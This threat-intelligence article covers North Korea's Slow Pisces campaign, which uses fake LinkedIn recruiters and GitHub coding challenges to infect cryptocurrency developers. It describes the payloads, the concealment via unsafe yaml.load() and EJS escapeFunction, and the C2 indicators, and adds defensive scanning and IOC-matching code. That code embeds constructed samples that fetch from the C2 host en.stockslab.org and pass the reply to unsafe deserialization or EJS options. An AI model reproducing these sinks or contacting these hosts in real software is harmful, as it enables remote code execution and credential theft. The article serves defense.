The North Korean state-sponsored threat group Slow Pisces has been running a targeted malware campaign against cryptocurrency developers, approaching them with fake job opportunities on LinkedIn. According to research published by Palo Alto Networks' Unit 42, the attackers use carefully crafted coding challenges to deliver custom malware. The group behind the campaign is responsible for billions of dollars in cryptocurrency theft. This campaign, which began in 2024, is an evolution of targeted social engineering designed to compromise high-value individuals in the cryptocurrency sector.

Background on Slow Pisces

Slow Pisces, also tracked as Jade Sleet, TraderTraitor, and PUKCHONG, is a North Korean state-sponsored threat actor whose primary mission is generating revenue for the DPRK regime. The group specializes in compromising organizations in the cryptocurrency sector and stealing their digital assets.

The group has been remarkably successful. Security researchers estimate that it stole over $1 billion USD from the cryptocurrency sector in 2023 alone. Its methods have evolved over time and include fake trading applications, malicious packages published to the npm registry, and supply chain compromises.

In December 2024, the FBI attributed the theft of $308 million from the Japanese exchange DMM Bitcoin to TraderTraitor. In February 2025 the group was linked to an even larger heist, the theft of roughly $1.5 billion from the Dubai-based exchange Bybit; investigators subsequently confirmed that the attack was carried out by TraderTraitor (another name for Slow Pisces).

Recent Attack Attribution

The connection between Slow Pisces and high-profile cryptocurrency thefts continues to grow. In March 2025, Safe{Wallet} revealed that the cybersecurity incident leading to the Bybit $1.5 billion heist was a "highly sophisticated, state-sponsored attack" conducted by TraderTraitor. Security researchers indicated that the attackers took deliberate steps to erase traces of their malicious activity to hamper investigation efforts.

The LinkedIn Recruitment Campaign

The current campaign represents a sophisticated social engineering operation targeting a specific professional demographic. Palo Alto Networks Unit 42 discovered that Slow Pisces has been impersonating recruiters on LinkedIn since 2024, engaging with potential targets in the cryptocurrency development sector.

Multi-Stage Attack Process

The attack follows a carefully designed multi-stage process.

1. Initial contact through LinkedIn, posing as recruiters from cryptocurrency companies

2. Distribution of benign PDF job descriptions to targets who respond

3. Presentation of coding challenges that direct victims to malicious GitHub repositories

4. Execution of the repository code while the victim works on the challenge, at which point the application fetches data from an attacker-controlled server and the malware is delivered

Sam Rubin of Palo Alto Networks' Unit 42 noted: "This campaign reveals real-world financial impacts of social engineering and supply chain compromises and should serve as a critical reminder that your company's threat surface now includes your employees' professional networks".

Strategic Targeting

Slow Pisces specifically targets individuals involved in cryptocurrency projects, presumably due to their potential access to valuable digital assets and infrastructure. The group has been observed impersonating several organizations within the cryptocurrency sector, creating a convincing facade of legitimacy.

Technical Analysis of the Attack Chain

Stage 1: PDF Lures

The initial stage begins when Slow Pisces threat actors, posing as recruiters, engage with potential targets on LinkedIn. They send seemingly benign PDF files containing job descriptions for positions in cryptocurrency development. If targets express interest in the position, the attackers follow up with a coding challenge document that outlines several tasks.

These challenge documents typically include generic software development tasks alongside a "real project" coding challenge. The document provides a link to a GitHub repository where the victim is instructed to download and execute code as part of the application process.

Stage 2: GitHub Repositories

The GitHub repositories created by Slow Pisces contain code adapted from legitimate open-source projects. These repositories host applications designed to view and analyze various types of data.

- Stock market data

- Statistics from European soccer leagues

- Weather data

- Cryptocurrency prices

The programming languages used in these repositories are strategically selected based on the target's background. Unit 42 researchers observed that "The group primarily used projects in either Python or JavaScript, likely depending on whether the target applied for a front-end or back-end development role". They also noted some Java-based repositories, though these were less common, with only two instances impersonating a cryptocurrency application called jCoin.

This pattern suggests that attackers might create repositories on demand based on a target's preferred programming language, focusing on languages popular in the cryptocurrency sector.

Stage 3: Malware Deployment

When victims run the code from the GitHub repository as instructed in the coding challenge, the malicious process is triggered. In Python-based attacks, researchers observed a project titled "Stocks Pattern Analyzer" that was adapted from a legitimate repository.

Python Repository Analysis

The malicious Python repositories fetch data from several sources, all but one of which are legitimate. In one instance, data was fetched from:

- Two legitimate Wikipedia URLs

- One malicious domain controlled by Slow Pisces (en.stockslab[.]org)

The command-and-control (C2) hostname is chosen to blend in with the legitimate sources: en.stockslab[.]org mirrors the en. subdomain and .org top-level domain of en.wikipedia.org, so it does not stand out in a list of URLs the code fetches.

Malware Capabilities and Evasion Techniques

Advanced Delivery Methods

Rather than placing malware directly in the repositories or relying on easily spotted constructs such as Python's eval or exec, Slow Pisces keeps the repository code looking benign. The C2 server initially responds with valid application data (for example, S&P 500 company symbols in JSON format) and delivers a malicious payload only to validated targets, selected on criteria that likely include:

- IP address

- Geolocation

- Time

- HTTP request headers

This selective targeting approach allows the group to maintain tight control over who receives the malware, limiting exposure to their tools and techniques.

RN Loader and RN Stealer

Unit 42 researchers identified two previously unknown malware payloads used in this campaign.

1. RN Loader: This initial payload collects basic information about the victim's machine and operating system, sends it to the attackers' C2 server over HTTPS, and receives the next stage only if the C2 decides the victim is of interest.

2. RN Stealer: This more sophisticated infostealer is deployed selectively and can extract various types of sensitive data from compromised systems. When deployed on macOS systems, it can steal:

- Basic victim information (username, machine name, architecture)

- Lists of installed applications

- Directory listings and contents of the victim's home directory

- The login.keychain-db file containing saved credentials

- Stored SSH keys

- Configuration files for AWS, Kubernetes, and Google Cloud

Concealment Techniques

Slow Pisces employs two primary techniques to hide malicious code execution.

1. YAML deserialization: In the Python repositories, the attackers parse the C2 response with PyYAML's yaml.load() rather than yaml.safe_load(). With a loader that constructs arbitrary objects (yaml.Loader or yaml.UnsafeLoader, or the implicit default on PyYAML older than 5.1), a document containing tags such as !!python/object/apply can invoke any Python callable during parsing, so the C2 can return executable code disguised as configuration data. yaml.safe_load() rejects those tags with a ConstructorError.

2. EJS escapeFunction: In the JavaScript repositories, the group uses the Embedded JavaScript (EJS) templating library and passes the C2 response to ejs.render() as the options object. EJS accepts an escapeFunction option and, when the client option is set, inlines escapeFunction.toString() into the source of the compiled template function, so a string supplied by the C2 becomes JavaScript that runs on the next render. No eval() or new Function() appears in the repository; the library performs the evaluation.

Both techniques make detection and analysis harder: the repository contains no obvious malware indicators, the payload arrives only from the C2, and it runs primarily in memory.
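Before running a coding challenge, a reviewer wants two things the sections above describe: the list of hosts the project will contact (the Stocks Pattern Analyzer sample mixed two Wikipedia URLs with en.stockslab[.]org) and a flag on the two execution primitives, yaml.load() with an unsafe loader and EJS options taken from untrusted input. The following is an added example written for this page, not Unit 42 tooling and not code from the Slow Pisces repositories; the sample sources are constructed to mirror the described pattern, and the URL path on the stockslab host is an assumption.

```python
"""Pre-run review of a 'coding challenge' repository (added example, not Unit 42 code)."""
import ast
import re

UNSAFE_LOADERS = {"Loader", "UnsafeLoader"}  # construct arbitrary Python objects
SAFE_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader", "CBaseLoader"}
URL_RE = re.compile(r"https?://[^\s'\"]+")


def _name(node):
    """Bare class name from `yaml.Loader` or `Loader`; None for anything else."""
    return node.attr if isinstance(node, ast.Attribute) else getattr(node, "id", None)


def extract_urls(src):
    """Every http(s) string literal in a Python module, in source order."""
    found = [(n.lineno, n.col_offset, n.value) for n in ast.walk(ast.parse(src))
             if isinstance(n, ast.Constant) and isinstance(n.value, str) and URL_RE.match(n.value)]
    return [v for _, _, v in sorted(found)]


def scan_python_source(src):
    """(lineno, message) for each yaml.load()/load_all() call not pinned to a safe loader."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
                and node.func.attr in ("load", "load_all")
                and isinstance(node.func.value, ast.Name) and node.func.value.id == "yaml"):
            continue
        loader = _name(node.args[1]) if len(node.args) > 1 else None  # positional Loader
        for kw in node.keywords:
            if kw.arg == "Loader":
                loader = _name(kw.value)
        call = f"yaml.{node.func.attr}()"
        if loader is None:
            msg = f"{call} without Loader: unsafe default on PyYAML < 5.1, FullLoader on 5.x, TypeError on 6.x"
        elif loader in UNSAFE_LOADERS:
            msg = f"{call} with yaml.{loader}: !!python/object/apply can call any Python function"
        elif loader == "FullLoader":
            msg = f"{call} with FullLoader: had code-execution bypasses before PyYAML 5.4; use safe_load"
        elif loader in SAFE_LOADERS:
            continue
        else:
            msg = f"{call} with unrecognised loader {loader!r}: review"
        findings.append((node.lineno, msg))
    return sorted(findings)


# JavaScript side (regex heuristic): ejs.render(tpl, data, opts) / ejs.compile(tpl, opts)
# whose options come from a variable. With client set, EJS inlines
# escapeFunction.toString() into the compiled template, so attacker-controlled
# options are a code-injection sink.
EJS_RENDER = re.compile(r"\bejs\.render\s*\(\s*[^,()]+,\s*[^,()]+,\s*([A-Za-z_$][\w$.]*)\s*\)")
EJS_COMPILE = re.compile(r"\bejs\.compile\s*\(\s*[^,()]+,\s*([A-Za-z_$][\w$.]*)\s*\)")


def scan_js_source(src):
    """(lineno, message) for EJS calls whose options are not an object literal."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for pattern, fn in ((EJS_RENDER, "render"), (EJS_COMPILE, "compile")):
            m = pattern.search(line)
            if m:
                findings.append((lineno, f"ejs.{fn}() takes options from variable {m.group(1)!r}: "
                                         "escapeFunction/client must not be attacker-controlled"))
        if "escapeFunction" in line:
            findings.append((lineno, "escapeFunction set explicitly: confirm it is a trusted function"))
    return findings


# Constructed samples mirroring the reported pattern (not the actual repository code).
SAMPLE_PY = """\
import requests
import yaml

SOURCES = [
    "https://en.wikipedia.org/wiki/List_of_S%26P_500_companies",
    "https://en.wikipedia.org/wiki/Nasdaq-100",
    "https://en.stockslab.org/symbols",
]

def fetch_symbols(url):
    resp = requests.get(url, timeout=10)
    return yaml.load(resp.text, Loader=yaml.Loader)  # honours !!python tags

def fetch_symbols_safe(url):
    return yaml.safe_load(requests.get(url, timeout=10).text)
"""

SAMPLE_JS = """\
const ejs = require("ejs");

async function renderPrices(template, prices) {
  const opts = await fetch(C2_URL).then((r) => r.json()); // attacker-controlled
  return ejs.render(template, prices, opts);
}
"""

if __name__ == "__main__":
    print("URLs contacted:", *extract_urls(SAMPLE_PY), sep="\n  ")
    for ln, msg in scan_python_source(SAMPLE_PY) + scan_js_source(SAMPLE_JS):
        print(f"line {ln}: {msg}")
```

Run it against the cloned challenge before executing anything: a third host that is not a well-known data source, or any yaml.load() that is not pinned to SafeLoader, is reason to stop. The Python check only recognises the `yaml.load(...)` spelling (not `from yaml import load`), and the JavaScript check is a line-level regex, so treat both as review aids rather than proof of safety.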

Similar North Korean Campaigns

The use of LinkedIn and GitHub as attack vectors is not unique to Slow Pisces. Multiple DPRK-affiliated groups have employed similar tactics, including groups known as Alluring Pisces and Contagious Interview.

Contagious Interview Campaign

In April 2025, security researchers reported that the long-running North Korean "Contagious Interview" campaign, linked to the Lazarus Group, had set up three front companies, BlockNovas LLC, Angeloper Agency, and SoftGlide LLC, and was using them to distribute three malware families: BeaverTail, InvisibleFerret, and OtterCookie.

Like Slow Pisces, this group targeted crypto professionals through fake job offers, but used a different set of tools and techniques. Contagious Interview would conduct technical assessments or video interviews, during which malware was delivered under the guise of coding tasks or browser camera tests.

Broader North Korean Cyber Strategy

These campaigns are part of a broader pattern in North Korea's cyber operations. Alongside malware delivery, the regime runs schemes such as "Wagemole," in which DPRK operatives pose as remote IT workers using fabricated (and sometimes AI-generated) identities to get hired by legitimate companies, collect salaries for the regime, and gain insider access to data.

Infrastructure Analysis

The Slow Pisces operation maintains an extensive network of command-and-control infrastructure. Researchers identified numerous domains used in this campaign between February 2024 and February 2025. The domains often mimic legitimate services, using hostnames that begin with api. or cdn. so that they look like ordinary infrastructure in a developer's traffic.

Some notable domains and their associated IP addresses:

- getstockprice[.]com (70.34.245[.]118)

- cdn[.]clubinfo[.]io (5.206.227[.]51)

- en[.]stockslab[.]org (91.103.140[.]191)

- update[.]jquerycloud[.]io (192.236.199[.]57)
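Published indicators only help if they are actually matched against traffic. The following is an added example for this page, not Unit 42 tooling: it refangs the four domain and IP pairs listed above and runs them over a handful of constructed DNS and proxy log lines. The log format is an assumption made for the demonstration, and a subdomain of a listed domain counts as a hit.

```python
"""Match this campaign's published domains and IPs against DNS/proxy logs (added example)."""
import ipaddress
import re

# domain -> IP, exactly as listed on the page (defanged with "[.]").
IOC_PAIRS = {
    "getstockprice[.]com": "70.34.245[.]118",
    "cdn[.]clubinfo[.]io": "5.206.227[.]51",
    "en[.]stockslab[.]org": "91.103.140[.]191",
    "update[.]jquerycloud[.]io": "192.236.199[.]57",
}


def refang(indicator):
    """Turn a defanged indicator back into a matchable string."""
    return indicator.replace("[.]", ".").lower()


DOMAINS = {refang(d) for d in IOC_PAIRS}
IPS = {refang(ip) for ip in IOC_PAIRS.values()}

HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def domain_matches(host):
    """IOC domains that `host` equals or is a subdomain of."""
    host = host.lower().rstrip(".")
    return {d for d in DOMAINS if host == d or host.endswith("." + d)}


def find_ioc_hits(lines):
    """(line number, kind, indicator) for every match, in log order."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        for host in HOST_RE.findall(line):
            for d in sorted(domain_matches(host)):
                hits.append((lineno, "domain", d))
        for ip in IPV4_RE.findall(line):
            try:
                if str(ipaddress.ip_address(ip)) in IPS:
                    hits.append((lineno, "ip", ip))
            except ValueError:  # e.g. 999.1.1.1 in a free-text field
                pass
    return hits


# Constructed log lines (assumed format): a legitimate Wikipedia lookup, a DNS query
# and a proxied HTTPS connection to the C2, a subdomain of a listed domain, a clean line.
SAMPLE_LOG = [
    "2025-02-12T09:14:03Z dns client=10.0.0.5 qname=en.wikipedia.org rcode=NOERROR",
    "2025-02-12T09:14:04Z dns client=10.0.0.5 qname=en.stockslab.org rcode=NOERROR",
    "2025-02-12T09:14:05Z proxy client=10.0.0.5 dst=91.103.140.191:443 host=en.stockslab.org",
    "2025-02-12T09:20:17Z dns client=10.0.0.9 qname=api.getstockprice.com rcode=NOERROR",
    "2025-02-12T09:21:00Z proxy client=10.0.0.9 dst=203.0.113.10:443 host=example.com",
]

if __name__ == "__main__":
    for lineno, kind, ioc in find_ioc_hits(SAMPLE_LOG):
        print(f"line {lineno}: {kind} {ioc}")
```

Replace SAMPLE_LOG with lines read from your resolver or proxy export. The matcher deliberately does not flag the parent domain stockslab.org, because only en.stockslab[.]org is listed; add registered domains to DOMAINS if your policy is to block the whole zone.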

Mitigation Strategies

The most effective mitigation against these types of targeted social engineering campaigns remains strict segregation of corporate and personal devices. This helps prevent the compromise of corporate systems when personal devices are targeted.

1. Implementing robust security awareness training, especially for developers and cryptocurrency professionals

2. Exercising caution when receiving job offers through LinkedIn, particularly those requesting the execution of code

3. Running code from unknown sources only in an isolated, sandboxed environment: a disposable VM or container that holds no credentials, SSH keys, or cloud configuration files and has restricted network egress

4. Using advanced endpoint protection capable of detecting memory-only payloads

5. Monitoring for unusual network connections, especially to newly registered domains

The Slow Pisces campaign represents a sophisticated evolution in targeted cyber attacks against cryptocurrency developers. By leveraging professional networking platforms like LinkedIn and using legitimate-appearing coding challenges, the North Korean threat actors have created an effective method for delivering custom malware to high-value targets.

The group's record, including the billions stolen from cryptocurrency exchanges, shows the growing sophistication of state-sponsored threat actors and the increasing risk faced by individuals working in the cryptocurrency sector, whose personal development machines may hold keys to corporate infrastructure.